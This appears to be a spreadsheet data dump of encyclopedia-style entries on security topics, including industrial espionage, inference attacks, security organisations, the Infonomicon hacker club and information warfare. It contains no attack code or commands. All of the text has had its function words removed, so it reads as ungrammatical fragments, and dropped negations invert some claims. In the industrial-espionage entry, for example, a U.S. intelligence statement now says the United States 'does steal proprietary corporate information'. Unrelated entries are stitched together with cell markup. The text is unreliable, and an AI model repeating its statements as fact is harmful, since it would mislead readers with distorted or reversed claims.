polygraph examination entitled "test espionage sabotage" (tes), contributing notion interrelationship espionage sabotage countermeasures. practice, particularly "trusted insiders", generally considered functionally identical purpose informing countermeasures. agents process collection economic industrial espionage commonly occurs ways. firstly, dissatisfied employee appropriates information advance interests damage company. secondly, competitor foreign government seeks information advance technological financial interest. "moles", trusted insiders, generally considered best sources economic industrial espionage. historically known "patsy", insider induced, willingly duress, provide information. patsy initially asked hand inconsequential information and, compromised committing crime, blackmailed handing sensitive material. individuals leave company take employment another take sensitive information them. such apparent behavior focus numerous industrial espionage cases resulted legal battles. some countries hire individuals spying rather intelligence agencies. academics, business delegates, students often thought used governments gathering information. some countries, japan, reported expect students debriefed returning home. follow guided tour factory "lost". could engineer, maintenance man, cleaner, insurance salesman, inspector: anyone legitimate access premises.a break premises steal data search waste paper refuse, known "dumpster diving". information compromised unsolicited requests information, marketing surveys, technical support research software facilities. outsourced industrial producers information outside agreed-upon contract.computers facilitated process collecting information ease access large amounts information physical contact internet. history origins economic industrial espionage long history. father francois xavier d'entrecolles, visited jingdezhen, china 1712 later used visit reveal manufacturing methods chinese porcelain europe, sometimes considered conducted early case industrial espionage.historical accounts written industrial espionage britain france. attributed britain's emergence "industrial creditor", second decade 18th century emergence large-scale state-sponsored effort surreptitiously take british industrial technology france. witnesses confirmed inveigling tradespersons abroad placing apprentices england. protests ironworkers sheffield steelworkers newcastle, skilled industrial workers enticed abroad, first english legislation aimed preventing method economic industrial espionage. this prevent samuel slater bringing british textile technology united states 1789. order catch technological advances european powers, government eighteenth nineteenth centuries actively encouraged intellectual piracy.american founding father first u.s. treasury secretary alexander hamilton advocated rewarding bringing "improvements secrets extraordinary value" united states. this instrumental making united states industrial spies. 20th century east-west commercial development opportunities world rise soviet interest american european manufacturing know-how, exploited amtorg corporation. later, western restrictions export items thought likely increase military capabilities ussr, soviet industrial espionage well known adjunct spying activities 1980s. byte reported april 1984, example, although soviets sought develop microelectronics, technology appeared several years behind west's. soviet cpus required multiple chips appeared close exact copies american products intel 3000 lsi-11/2. "operation brunnhilde" some activities directed east german stasi (ministry state security). operation, "operation brunnhilde," operated mid-1950s early 1966 made spies many communist bloc countries. through least forays, many western european industrial secrets compromised. member "brunnhilde" ring swiss chemical engineer, jean paul soupert (also known "air bubble"), living brussels. described peter wright spycatcher "doubled" belgian sûreté l'état. revealed information industrial espionage conducted ring, including fact russian agents obtained details concorde's advanced electronics system. testified kodak employees, living working britain, trial accused passing information industrial processes him, though eventually acquitted.according 2020 american economic review study, east german industrial espionage west germany significantly reduced total factor productivity countries. soviet spetsinformatsiya system secret report military-industrial commission ussr (vpk), 1979–80, detailed spetsinformatsiya (russian: специнформация, "special records") could utilised twelve different military industrial areas. writing bulletin atomic scientists, philip hanson detailed spetsinformatsiya system industrial branch ministries formulated requests information technological development military programs. acquisition plans described operating 2-year 5-year cycles 3000 tasks underway year. efforts aimed civilian military industrial targets, petrochemical industries. some information gathered compare soviet technological advancement competitors. much unclassified information also gathered, blurring boundary "competitive intelligence".the soviet military recognised making much better acquired information civilian industries, record replicating developing industrial technology poor. legacy cold espionage following demise soviet union cold war, commentators, including congressional intelligence committee, noted redirection amongst espionage community military industrial targets, western former communist countries making "underemployed" spies expanding programs directed stealing information.the legacy cold spying included redirection personnel spying apparatus computer databases, scanners eavesdropping, satellites, bugs wires. industrial espionage part foreign policy according article news website theintercept.com, "potentially sabotaging another country's hi-tech industries companies long sanctioned american strategy." article based leaked report issued former u.s. director national intelligence james clapper's office evaluated theoretical scenario intelligence could used overcome loss united states' technological innovative edge. report show actual occurrence u.s. conducted industrial espionage, contacted director national intelligence office responded with, "the united states—unlike adversaries—does steal proprietary corporate information private american companies' bottom lines", "the intelligence community regularly engages analytic exercises identify potential future global environments, could help united states government respond". report, said, intended not, reflection current policy operations".former director stansfield turner stated 1991 "nevertheless, increase emphasis securing economic intelligence, developed countries-our allies friends compete economically-but turn first political military assistance crisis. this means rather instinctively reaching human, on-site spying, united states want look impersonal technical systems, primarily satellite photography intercepts".former director james woolsey acknowledged 2000 united states steals economic secrets foreign firms governments "with espionage, communications, reconnaissance satellites". also stated "not provide secrets, technological secrets american industry." listed three reasons understanding whether sanctions functioning countries sanction, monitoring dual-use technology could used produce develop weapons mass destruction, bribery uphold foreign corrupt practices act.in 2013 united states accused spying brazilian company petrobras. brazil's president dilma rousseff stated tantamount industrial espionage security justification.in 2014 former intelligence officer edward snowden stated america's national security agency engaged industrial espionage spied german companies compete firms. also highlighted fact uses mobile phone apps angry birds gather personal data.in september 2019, security firm published report linking series attacks targeting chinese aviation agencies 2012 2017. israel's economic espionage united states israel active program gather proprietary information within united states. these collection activities primarily directed obtaining information military systems advanced computing applications used israel's sizable armaments industry.israel accused government selling military technology secrets china.in 2014 american counter-intelligence officials told members house judiciary foreign affairs committees israel's current espionage activities america "unrivaled". computers internet personal computers computers become exercising industrial espionage enormous amount information contain ease copied transmitted. computers espionage increased rapidly 1990s. information commonly stolen individuals posing subsidiary workers, cleaners repairmen, gaining access unattended computers copying information them. laptops were, still are, prime target, traveling abroad business warned leave period time. perpetrators espionage known find many ways conning unsuspecting individuals parting, often temporarily, possessions, enabling others access steal information. "bag-op" refers hotel staff access data, laptops, hotel rooms. information stolen transit, taxis, airport baggage counters, baggage carousels, trains internet rise internet computer networks expanded range detail information available ease access purpose industrial espionage. this type operation generally identified state backed sponsored, "access personal, financial analytic resources" identified exceed could accessed cybercriminals individual hackers. sensitive military defense engineering industrial information immediate monetary value criminals, compared with, say, bank details. analysis cyberattacks suggests deep knowledge networks, targeted attacks, obtained numerous individuals operating sustained organized way. opportunities sabotage rising internet also extended opportunities industrial espionage sabotage. early 2000s, noticed energy companies increasingly coming attack hackers. energy power systems, jobs like monitoring power grids water flow, isolated computer networks, connected internet, leaving vulnerable, historically built-in security features. methods industrial espionage increasingly become concern governments, potential attacks terrorist groups hostile foreign governments. malware means perpetrators conducting industrial espionage exploiting vulnerabilities computer software. malware spyware "tool[s] industrial espionage", "transmitting digital copies trade secrets, customer plans, future plans contacts". newer forms malware include devices surreptitiously switch mobile phones camera recording devices. attempts tackle attacks intellectual property, companies increasingly keeping important information network, leaving "air gap", companies building faraday cages shield electromagnetic cellphone transmissions. distributed denial service (ddos) attack distributed denial service (ddos) attack uses compromised computer systems orchestrate flood requests target system, causing shut deny service users. could potentially used economic industrial espionage purpose sabotage. this method allegedly utilized russian secret services, period weeks cyberattack estonia 2007, response removal soviet memorial. notable cases france united states between 1987 1989, texas instruments thought targeted french dgse intention helping france's groupe bull. 1993, u.s. aerospace companies also thought targeted french interests. during early 1990s, france described aggressive pursuers espionage garner foreign industrial technological secrets. france accused u.s. attempting sabotage high tech industrial base. government france alleged conducted ongoing industrial espionage american aerodynamics satellite companies. volkswagen 1993, manufacturer opel, german division general motors, accused volkswagen industrial espionage opel's chief production, jose ignacio lopez, seven executives moved volkswagen. volkswagen subsequently threatened defamation, resulting four-year legal battle. case, finally settled 1997, resulted largest settlements history industrial espionage, volkswagen agreeing general motors $100 million least billion parts company years, although explicitly apologize lopez's behavior. hilton starwood april 2009, starwood accused rival hilton worldwide "massive" case industrial espionage. after acquired blackstone group, hilton employed managers executives starwood. starwood accused hilton stealing corporate information relating luxury brand concepts, used setting denizen hotels. specifically, former head luxury brands group, klein, accused downloading "truckloads documents" laptop personal email account. google operation aurora january 2010, google announced operators, within china, hacked google china operation, stealing intellectual property and, particular, accessing email accounts human rights activists. attack thought part widespread cyber attack companies within china become known operation aurora. intruders thought launched zero-day attack, exploiting weakness microsoft internet explorer browser, malware used modification trojan "hydraq". concerned possibility hackers taking advantage previously unknown weakness internet explorer, governments germany and, subsequently france, issued warnings browser.there speculation "insiders" involved attack, google china employees denied access company's internal networks company's announcement. february 2010, computer experts u.s. national security agency claimed attacks google probably originated chinese universities associated expertise computer science, shanghai jiao tong university shandong lanxiang vocational school, latter close links chinese military.google claimed least companies also targeted cyber attack, said london times, part "ambitious sophisticated attempt steal secrets unwitting corporate victims" including "defence contractors, finance technology companies". rather work individuals organised criminals, level sophistication attack thought "more typical nation state". some commentators speculated whether attack part thought concerted chinese industrial espionage operation aimed getting "high-tech information jump-start china's economy". critics pointed alleged attitude intellectual property foreign businesses china, letting operate seeking copy reverse engineer technology benefit chinese "national champions". google's case, (also) concerned possible misappropriation source code technology benefit chinese rival baidu. march 2010 google subsequently decided cease offering censored results china, leading closing chinese operation. lee, united states charged former netlogic inc. engineers, yuefei committing economic espionage tsmc netlogic, inc. jury acquitted defendants charges regard tsmc deadlocked charges regard netlogic. 2010, federal judge dismissed espionage charges defendants. judge ruled u.s. government presented evidence espionage. dongxiao chordiant software, inc. 2010, federal jury convicted chordiant software, inc., u.s. corporation, stealing dongxiao yue's jrpc technologies used product called chordiant marketing director. previously filed lawsuits symantec corporation similar theft. concerns national governments brazil revelations snowden documents provided information effect united states, notably vis-à-vis nsa, conducting aggressive economic espionage brazil. canadian intelligence apparently supported u.s. economic espionage efforts. china chinese cybersecurity company qihoo accused central intelligence agency united states 11-year-long hacking campaign targeted several industries including aviation organizations, scientific research institutions, petroleum firms, internet companies, government agencies. united states 2009 report government, aerospace defense company northrop grumman, describes chinese economic espionage comprising "the single greatest threat u.s. technology". blogging 2009 cyber attack google, stewart secureworks referred "persistent campaign 'espionage-by-malware' emanating people's republic china (prc)" corporate state secrets "shanghaied" past years. northrop grumann report states collection defense engineering data cyberattack regarded "saved recipient information years significant amounts funding". concerns extent cyberattacks emanating china situation described dawn "new cold cyberwar".according edward snowden, national security agency spies foreign companies. june 2015 wikileaks published documents national security agency spying french companies. united kingdom during december 2007, suddenly revealed jonathan evans, head united kingdom's mi5, sent confidential letters chief executives security chiefs country's banks, accountants legal firms warning attacks chinese 'state organisations'. summary also posted secure website centre protection national infrastructure, accessed nation's 'critical infrastructure' companies, including 'telecoms firms, banks water electricity companies'. security expert warned 'custom trojans,' software specifically designed hack particular firm feed back data. whilst china identified country active internet spying, countries said using similar techniques. chinese government responded accusations economic espionage saying report activities 'slanderous' government opposed hacking prohibited law. germany german counter-intelligence experts maintained german economy losing around billion equivalent 30,000 jobs economic espionage yearly.in operation eikonal, german agents received "selector lists" search terms dragnet surveillance. they contain addresses, mobile phone numbers email accounts surveillance system containing hundreds thousands possibly million targets. these lists subject controversy 2008 revealed contained terms targeting european aeronautic defence space company (eads), eurocopter project well french administration, first noticed employees 2005. after revelations made whistleblower edward snowden, decided investigate issue whose october 2013 conclusion least 2,000 selectors aimed western european even german interests violation memorandum agreement germany signed 2002 wake 9/11 terror attacks. after reports emerged 2014 eads eurocopter surveillance targets left party greens filed official request obtain evidence violations.the bnd's project group charged supporting investigative committee german parliament spring 2014, reviewed selectors discovered 40,000 suspicious search parameters, including espionage targets western european governments numerous companies. group also confirmed suspicions systematically violated german interests concluded americans could perpetrated economic espionage directly germans' noses. investigative parliamentary committee granted access nsa's selectors list appeal opposition politicians failed germany's court. instead ruling coalition appointed administrative judge, kurt graulich, "person trust" granted access list briefed investigative commission contents analyzing 40,000 parameters. almost 300-paged report graulich concluded european government agencies targeted massively americans hence broke contractual agreements. also found german targets received special protection surveillance domestic intelligence agencies germany's basic (grundgesetz) including numerous enterprises based germany featured nsa's wishlist surprising plenitude. competitive intelligence economic industrial espionage "competitive intelligence" involves legal ethical activity systematically gathering, analyzing managing information industrial competitors. include activities examining newspaper articles, corporate publications, websites, patent filings, specialised databases, information trade shows like determine information corporation. compilation crucial elements sometimes termed crs, competitive intelligence solution competitive response solution, roots market research. douglas bernhardt characterised "competitive intelligence" involving "the application principles practices military national intelligence domain global business"; commercial equivalent open-source intelligence. difference competitive intelligence economic industrial espionage clear; needs understand legal basics recognize draw line two. also business intelligence corporate warfare cyber spying genetically modified maize corporate espionage labor spying united states american economic espionage 1996 history india notes references bibliography books newspapers journals further reading external links comparing insider sabotage espionage: model-based analysis spooky business: corporate espionage against nonprofit organizations spooky business: u.s. corporations enlist ex-intelligence agents nonprofit groups u.s. corporations enlist ex-intelligence agents nonprofit groups corporate espionage undermines democracy</t>
  </si>
  <si>
    <t>SekChek Local</t>
  </si>
  <si>
    <t>sekchek security audit benchmarking toolset dating 1996. history sekchek formed former auditors deloitte touche 1996. toolset automated processes analyse logical security profile computer.the concept initial version sekchek brought deloitte south africa gordon docherty jose masson, collaborated product design deliverables chris little cisa, cissp deloitte's computer assurance services division sandton, south africa. first version analysed control parameters as/400 systems. while concept good, chris' main concerns time clients send operating system security files off-premise sekchek processing, generated reports highlighted every parameter line sekchek's world view best practice. this reports hundreds pages produced, minimal prioritisation parameters fix. over time, reports became concise user-friendly. march 2018 sekcheck's website gave notice operations would cease 2018. reasons cited included sekcheks' business model less relevant business environment 2018, surge compliance regulatory requirements including gdpr monetary difficulties losses insolvency credit-card processor. products sekchek classic product gathered information host would sent encrypted sekchek report processing enable checking security policies correctly configured. this originally worked as/400 number platforms extended next years encompass windows, netware unix. reports anonymously compared machines average similar industry computers. company introduced local version product 2008 avoided need send data off-site. windows utility specifically audit active directory (ad) domain level rather server level analyzed tool. reception product initially marketed security evaluator noted providing comprehensive reports security vulnerability computer system. references "audit programs icqs". isaca.org. archived original (fee required) 2007-07-11. retrieved 2018-12-13. "annual specialist audit activity report 2004/5" (pdf). bromley internal audit report. november 2006. archived original (pdf) 2011-08-27. retrieved 2009-05-20. carroll, mariana (november 2006). information systems auditor's profile" (pdf). unisa dissertation. these reports used identify weaknesses well risk ratings suggested corrective actions. these statements supported mookhey (2004) asserts "the tools security auditing prevalentand driven mainly inherent complexity within information systems. external links sekchek home page</t>
  </si>
  <si>
    <t>Inference attack</t>
  </si>
  <si>
    <t>inference attack data mining technique performed analyzing data order illegitimately gain knowledge subject database. subject's sensitive information considered leaked adversary infer real value high confidence. this example breached information security. inference attack occurs user able infer trivial information robust information database without directly accessing object inference attacks piece together information security level determine fact protected higher security level.while inference attacks originally discovered threat statistical databases, today also pose major privacy threat domain mobile sensor data. data accelerometers, accessed third-party apps without user permission many mobile devices, used infer rich information users based recorded motion patterns (e.g., driving behavior, level intoxication, age, gender, touchscreen inputs, geographic location). highly sensitive inferences also derived, example, tracking data, smart meter data voice recordings (e.g., smart speaker voice commands). references</t>
  </si>
  <si>
    <t>Influenster</t>
  </si>
  <si>
    <t>influenster product discovery reviews platform consumers. influenster uses social media analytics measure users’ influence social media. influenster launched 2010. influenster launched 2014 android launched 2015. january 2018, influenster's community consists million users. influenster acquired bazaarvoice 2019. features influenster platform consisting million reviews, 880,000 reviews generated month. these products represent 100k consumer brands million product pages users review, ask/answer questions, upload photos/videos of.based user's impact score supplied demographic information, invited influenster campaigns. influenster runs variety different types campaigns, generally involve sending invited users complimentary product service sample discuss social media. after sampling, user asked complete final market-research survey.influenster offers coupons offers partner retailers brands users access product discovery experience platform. uses facebook, twitter, instagram, youtube, tumblr, foursquare, google+, multi-platform blog widget, friend referrals determine impact score. impact points largely calculated based number followers friends user given social network.influenster allows users unlock "expert" "lifestyle" badges completing survey questions interests behaviors, writing reviews products, answering users' questions, sharing influenster product pages across social media channels. these badges part gamification system reward specific types users invites specific influenster campaigns matching demographic. business model primary business model influenster involves brands working influenster voxbox virtualvox campaigns. voxbox virtualvox campaigns, brands offer complimentary products digital rewards influenster users meet brand product-specific criteria. series funding 2016, influenster raised million financing ebates, leading online cashback shopping service. also social media marketing social influence list social networking websites references external links official website</t>
  </si>
  <si>
    <t>InfoSec Institute</t>
  </si>
  <si>
    <t>infosec institute technology training company. provides certification-based training courses security professionals enterprise-grade security awareness phishing training businesses, agencies technology professionals. history company's training library provides multi-course tracks function, certification-specific training short-form, continuing education training. course library includes courses covering topics like ethical hacking, network security, mobile forensics more. infosec institute's securityiq integrates security awareness training, phishing simulations personalized learning. scales employees’ security aptitudes, roles learning styles. history infosec institute founded 1998 team information security instructors. also cyber security references</t>
  </si>
  <si>
    <t>Infonomicon</t>
  </si>
  <si>
    <t>infonomicon computer club premier hacking organization, comprising dozen people across united states. once called infonomicon media, majority group members produce hacker-related webcasts, including podcasts webcasts. group changed name early 2006 infonomicon computer club, since started work projects outside media realm. members done many presentations various hacker conventions across country, recent phreaknic november 2015 (for complete listing, presentations section). there little "mainstream" attention club 2007, episodes member sites mentioned often hacker-related broadcasts binary revolution radio hak5. members order appearance) droops infonomicon father obfuscated infonomicon father phizone host infonomicon irongeek author hacking illustrated lowtek_mystik (morgellon) host ninja night school radio enigma twatech.org admin p0trillo23 twatech.org host kn1ghtl0rd development department ponyboy host bellcore radio livinded twatech.org host kotrin dude mralk3 another dude downer head graphic department dosman host packet sniffers zach host packet sniffers electroman host electrostuff telcobob legged groove machine member frolicswscissors legged groove machine member fiebig host m0diphyd.org infonomicon cohort ragechin shellbox admin history infonomicon started june 2004, first episode broadcast title droops radio (later changed infonomicon radio). episodes focused variety subjects, hardware hacking, lockpicking, transmitters, wilderness survival tips. series lasted december 2005 produced episodes. show originally hosted droops, later bringing obfuscated second host episode (july 2004). show released sporadic episodes year, late 2004 added video webcast, called infonomicon included content droops outside contributors. august 2005, contributors, phizone, joined group, helped launch website called podcastincubator.com, provided free hosting individuals interested starting podcast. also august, droops became administrator hackermedia.org, site many hacker audio video webcasts using announce episodes shows. towards october, 2005 droops began setting free computers children installing linux windows boxes. used edubuntu, designed educational tool children learn linux time learned things educational software included linux distribution. club also released linux live called podcastfertilizer slast. podcast fertilizer, podfert, designed people want make podcast. contains free audio editing software well tools embedded directly slax live slast also based slax live asterisk software pre-compiled users simply enter basic information make computer temporary asterisk console. april 2006, several members infonomicon gave presentations notacon cleveland, ohio, also participated hacker media panel, moderated jason scott. october 2006 several members gave presentation phreaknic nashville, april 2007 member (kn1ghtl0rd) spoke notacon april, 2007 cleveland, ohio. october 2007 lowtek_mystik kn1ghtl0rd gave talk rfid phreaknic nashville, this part duo's rfid information covered previously unaddressed material. october 2008 brought members together phreaknic nashville, droops morgellon (formally lowtek_mystik) gave talk started basic electronics knowledge moved discussing build embedded systems (specifically using arduino). irongeek presented talk hardware keyloggers, use, advantages/disadvantages current crop market, possibly detect physical inspection software. presentations notacon 'c64 (revival progress)' zach notacon april 2005 interzone 'hacker media' droops ponyboy interz0ne march 2006 notacon 'build your linux' droops notacon april 2006 'blended threat management' kn1ghtl0rd notacon april 2006 'the rise fall payphones, evolution phreaking' ponyboy notacon april 2006 'network printer hacking' irongeek notacon april 2006 'hacker media panel' droops, ponyboy, lowtek_mystik, dosman, zach, (also featuring slick0, jason scott, drew) notacon april 2006 phreaknic 'understanding rfid' lowtek mystik kn1ghtl0rd october 2006 (see video below) 'penetration testing bart's irongeek october 2006 notacon 'grid computing alchemi .net' kn1ghtl0rd april 2007 phreaknic 0x0b 'rfid 2.0' lowtek mystik kn1ghtl0rd october 2007 notacon 'lock picking frontier: from mechanical electronic locks' dosman april 2008 phreaknic 'the extraordinary journey fundamental electronics fabulous enchanted systems arduino's magical potions.' droops morgellon october 2008 'hardware keyloggers: use, review, stealth' irongeek october 2008 notacon 'interactivity arduinos, transducing physical world' droops morgellon lowtek mystic april 2009 (morgellon unable make con, droops presented talk solo) phreaknic 'arduino part deux' droops morgellon lowtek mystic october 2009 (morgellon unable make con, droops presented talk solo) 'darknets: games anonymizing private networks' irongeek october 2009 'lock picking crime (unless here)' dosman dave october 2009 phreaknic beginners guide nootropics' ponyboy november 2015 other projects hackermedia site hacker media content geeks unleashed: assault batteries fighting game phreak revived site phreaking content slast linux live-cd containing asterisk based slax free linux project send linux mailed back computer documentation project computer books rfid syphon shown phreaknic references hacker public radio twat radio: today techie (archive.org final snapshot website different owner now) slast linux hackermedia official website list episodes jason scott's website binary revolution radio bellcore radio infogrid website gridcrack console download page kn1ghtl0rd lowtek_mystik talking rfid phreaknic</t>
  </si>
  <si>
    <t>Information Card Foundation</t>
  </si>
  <si>
    <t>june 2008 independent non-profit organization, information card foundation (icf), created. consists steering community board members steering business board members. some businesses include equifax, google, microsoft, novell, oracle corporation paypal. foundation formed promote information card technology, user-centric, cross-platform, identity technology shifts control personal information individual. information cards allow user control release self-asserted claims claims made third-party identity provider (called "card issuer") represented using card/wallet metaphor user interface (web smart client) called "card selector", relying parties (i.e. apps websites) notes references technology leaders favor online card over passwords york times article 24-jun-08 announcing information card foundation press release announcement information card foundation heavy hitters collaborate promoting digital-id tech computerworld article covering announcement. external links information card foundation website information card ecosystem white paper</t>
  </si>
  <si>
    <t>Information Exchange Gateway</t>
  </si>
  <si>
    <t>nato defined concept information exchange gateway (ieg) facilitate secure communication different security management domains. designed provide standard secure method communication nato, nato nations, non-nato nations, coalition forces, government organisations (ngos), international organisations (ios).an information exchange gateway provides information exchange services (ies) facilitate exchange information networks, including data protocol translation necessary, information protection services (ips) ensure intended information exchanged. addition, node protection services (nps) ensure information exchanged safe secure intended information validated exchanged.nato defined five main scenarios scenario variants transferring classified information. scenarios take account security classifications domains connect, well security policy, owners administrators domains. scenarios, must include guard provide functions. when used guard, ieg's split two. implementation nexor implemented demonstrator european defence agency. references</t>
  </si>
  <si>
    <t>Shari Steele</t>
  </si>
  <si>
    <t>shari steele technologist, lawyer, activist digital freedom. worked electronic frontier foundation legal director executive director, well project executive director. career steele joined electronic frontier foundation (eff) staff attorney 1992. later became legal director, position held eight years became eff's executive director 2000. steele helped grow small team lawyers much larger organization known involvement legal disputes involving digital rights, including challenges broad digital surveillance practices national security agency (nsa) united states government's national security letters.although intended retire left eff, instead decided take position executive director project 2015, held 2019. known work project make organization inclusive, well guiding organization major scandal involving accusations sexual assault jacob appelbaum, employee activist. life education steele earned degree widener university school law. later earned ll.m. degree georgetown university center, also worked teaching fellow. steele also master's degree instructional media, earned west chester university.steele married bill vass, vice president engineering amazon services. references</t>
  </si>
  <si>
    <t>Information Security Automation Program</t>
  </si>
  <si>
    <t>information security automation program (isap, pronounced sap”) u.s. government multi-agency initiative enable automation standardization technical security operations. while u.s. government initiative, standards based design benefit information technology security operations. isap high level goals include standards based automation security checking remediation well automation technical compliance activities (e.g. fisma). isap's level objectives include enabling standards based communication vulnerability data, customizing managing configuration baselines various products, assessing information systems reporting compliance status, using standard metrics weight aggregate potential vulnerability impact, remediating identified vulnerabilities. isap's technical specifications contained related security content automation protocol (scap). isap's security automation content either contained within, referenced national vulnerability database. isap formalized trilateral memorandum agreement (moa) defense information systems agency (disa), national security agency (nsa), national institute standards technology (nist). office secretary defense (osd) also participates department homeland security (dhs) funds operation infrastructure isap relies (i.e., national vulnerability database). external links information security automation program site security content automation protocol site national vulnerability database sitethis document incorporates text information security automation program overview beta), public domain publication u.s. government.</t>
  </si>
  <si>
    <t>Information Systems Professional</t>
  </si>
  <si>
    <t>information systems professional (i.s.p), informaticien professionnel agréé (i.p.a. french), professional designation issued canadian information processing society (cips). introduced 1989, professional designation recognised legislation provinces canada. before meeting entry requirements professional status applicant "candidate member i.s.p" designation. cips developed computer science accreditation council (csac), information systems technology accreditation council (istac) accredit baccalaureate programs computer science, software engineering, management information systems, computer systems technology, applied information technology, post-diploma type programs canada. these accredited programs combined several years experience lead i.s.p. designation. also fédération l'informatique québec external links cips legislation alberta: professional occupational associations registration act, r.s.a. 2000, p-26, information systems professional regulation, alta. reg. 39/1997 british columbia: society act, r.s.b.c. 1996, s.s. 86-93 (occupational titles protection) brunswick: canadian information processing society brunswick act, 2001, nova scotia: canadian information processing society nova scotia act, s.n.s. 2002, ontario: respecting canadian information processing society ontario, 1998, saskatchewan: canadian information processing society saskatchewan act, s.s. 2005, c-0.2</t>
  </si>
  <si>
    <t>Information Systems Security Architecture Professional</t>
  </si>
  <si>
    <t>Information Systems Security Association</t>
  </si>
  <si>
    <t>information systems security association (issa) not-for-profit, international professional organization information security professionals practitioners. founded 1984, work establishment started 1982. issa promotes sharing information security management practices educational forums, publications networking opportunities among security professionals. issa members award winners include many industry’s notable luminaries represents wide range industries communications, education, healthcare, manufacturing, financial consulting well federal, state local government departments agencies.the association publishes issa journal, peer-reviewed publication issues trends industry. also partners (enterprise strategy group) release yearly research report, "the life times cyber security professional", examine experiences cybersecurity professionals navigate modern threat landscape effects careers. organization information systems security association board directors elected annually members committees appointed. headquarters issa located vienna, virginia. issa international board directors executive officers president: candy alexander, cissp, cism vice president: peinert, cissp-issmp secretary/director operations: shawn murray, ph.d., c|iso, cissp, crisc, fitsp-a, c|ei treasurer/chief financial officer: pamela fusco, cissp membership issa international membership base. goals primary goal issa promote management practices ensure confidentiality, integrity availability information resources. issa facilitates interaction education create successful environment global information systems security professionals involved. issa's goals promote security education skills development, encourage free information exchanges, communicate current events within security industry help express importance security controls enterprise business management. code ethics applicant membership, individual expected bounded principle ethics related information security career. applicants issa membership attest will: perform professional activities duties accordance applicable laws highest ethical principles; promote generally accepted information security current best practices standards; maintain appropriate confidentiality proprietary otherwise sensitive information encountered course professional activities; discharge professional responsibilities diligence honesty; refrain activities might constitute conflict interest otherwise damage reputation employers, information security profession, association; intentionally injure impugn professional reputation practice colleagues, clients, employers. international presence issa present hundred countries, including europe asia, 10,000 members. also isaca business network computer security information security information security management system risk references</t>
  </si>
  <si>
    <t>Information Systems Security Engineering Professional</t>
  </si>
  <si>
    <t>Information warfare</t>
  </si>
  <si>
    <t>information warfare (iw) different cyber warfare attacks computers, software, command control systems) concept involving battlespace management information communication technology (ict) pursuit competitive advantage opponent. information warfare manipulation information trusted target without target's awareness target make decisions interest interest conducting information warfare. result, clear information warfare begins, ends, strong destructive information warfare involve collection tactical information, assurance(s) one's information valid, spreading propaganda disinformation demoralize manipulate enemy public, undermining quality opposing force's information denial information-collection opportunities opposing forces. information warfare closely linked psychological warfare.the united states military focus tends favor technology hence tends extend realms electronic warfare, cyberwarfare, information assurance computer network operations, attack, defense. most rest world much broader term "information operations" which, although making technology, focuses human-related aspects information use, including (amongst many others) social network analysis, decision analysis, human aspects command control. overview information described "the information achieve national objectives." according nato, "information operation conducted order gain information advantage opponent."information warfare take many forms: television, internet radio transmission(s) jammed. television, internet radio transmission(s) hijacked disinformation campaign. logistics networks disabled. enemy communications networks disabled spoofed, especially online social community modern days. stock exchange transactions sabotaged, either electronic intervention, leaking sensitive information placing disinformation. drones surveillance robots webcams. communication management synthetic media organised social media online content generation platforms used opinion engineering among masses.the u.s. force information warfare squadrons since 1980s. fact, official mission u.s. force fly, fight win...in air, space cyberspace", latter referring information warfare role. u.s. force often risks aircraft aircrews attack strategic enemy communications targets, remotely disabling targets using software means provide safer alternative. addition, disabling networks electronically (instead explosively) also allows quickly re-enabled enemy territory occupied. similarly, counter-information warfare units employed deny capability enemy. first application techniques used iraqi communications networks gulf war. also gulf war, dutch hackers allegedly stole information u.s. troop movements u.s. defense department computers tried sell iraqis, thought hoax turned down. january 1999, u.s. intelligence computers coordinated attack (moonlight maze), part came russian mainframe. this could confirmed russian cyber attack non-attribution principle online identity serve proof real world identity. battlefield innovation advanced autonomous icts engendered revolution military affairs, encompasses nations' icts cyberspace physical battlefield wage adversaries. three prevalent revolutions military affairs come form cyberattacks, autonomous robots communication management. within realm cyberspace, primary weapons: network-centric warfare c4isr, denotes integrated command, control, communications, computers, intelligence, surveillance reconnaissance. furthermore, cyberspace attacks initiated nation another nation underlying goal gaining information superiority attacked party, includes disrupting denying victimized party's ability gather distribute information. real-world occurrence illustrated dangerous potential cyberattacks transpired 2007, strike israeli forces demolished alleged nuclear reactor syria constructed collaborative effort syria north korea. accompanied strike cyberattack syria's defenses, left blind attack nuclear reactor and, ultimately allowed attack occur (new york times 2014). example basic attack nation within cyberspace distributed denial service (ddos) attack, utilized hinder networks websites lose primary functionality. implied, cyberattacks affect military party attacked, rather whole population victimized nation. since aspects daily life integrated networks cyberspace, civilian populations potentially negatively affected wartime. example, nation chose attack another nation's power grid servers specific area disrupt communications, civilians businesses area would also deal power outages, could potentially lead economic disruptions well. moreover, physical icts also implemented latest revolution military affairs deploying new, autonomous robots (i.e. unmanned drones) battlefield carry duties patrolling borders attacking ground targets. humans remote locations pilot many unmanned drones, however, advanced robots, northrop grumman x-47b, capable autonomous decisions. despite piloting drones remote locations, proportion drone pilots still suffer stress factors traditional warfare. according npr, study performed pentagon 2011 found drone pilots “burned out” undergo high levels stress. furthermore, approximately drone pilots surveyed study labeled “clinically distressed” pilots also showing signs post-traumatic stress disorder.modern icts also brought advancements communications management among military forces. communication vital aspect involved party and, implementation icts data-enabled devices, military forces able disseminate information faster ever before. example, militaries employing iphones upload data information gathered drones area. notable examples russo-ukrainian 2022 ukrainian forces taken advantage deficiencies russian communications allowing piggyback ukrainian networks, connect, communicate. ukrainian forces eavesdrop, russian communications crucial part conversation.in effort build support prior invasion ukraine, russia perpetuated narrative claimed ukrainian government committing violence russian speaking population. publishing large amounts disinformation internet, alternate narrative picked search results, google news. russian interference foreign elections russian interference foreign elections, notably russian interference 2016 united states elections, described information warfare. legal ethical concerns while information warfare yielded many advances types attack government make, also raised concerns moral legal ambiguities surrounding particularly form war. traditionally, wars analyzed moral scholars according theory. however, information warfare, just theory fails theory based traditional conception war. information warfare three main issues surrounding compared traditional warfare: risk party nation initiating cyberattack substantially lower risk party nation initiating traditional attack. this makes easier governments, well potential terrorist criminal organizations, make attacks frequently could traditional war. information communication technologies (ict) immersed modern world wide range technologies risk cyberattack. specifically, civilian technologies targeted cyberattacks attacks even potentially launched civilian computers websites. such, harder enforce control civilian infrastructures physical space. attempting would also raise many ethical concerns right privacy, making defending attacks even tougher. mass-integration system makes much harder assess accountability situations arise using robotic and/or cyber attacks. robotic weapons automated systems, becoming increasingly hard determine responsible particular event happens. this issue exacerbated case cyberattacks, sometimes virtually impossible trace initiated attack first place.recently, legal concerns arisen centered issues, specifically issue right privacy united states america. general keith alexander, served head cyber command president barack obama, noted "mismatch technical capabilities conduct operations governing laws policies" writing senate armed services committee. point concern targeting civilian institutions cyberattacks, general promised maintain mindset 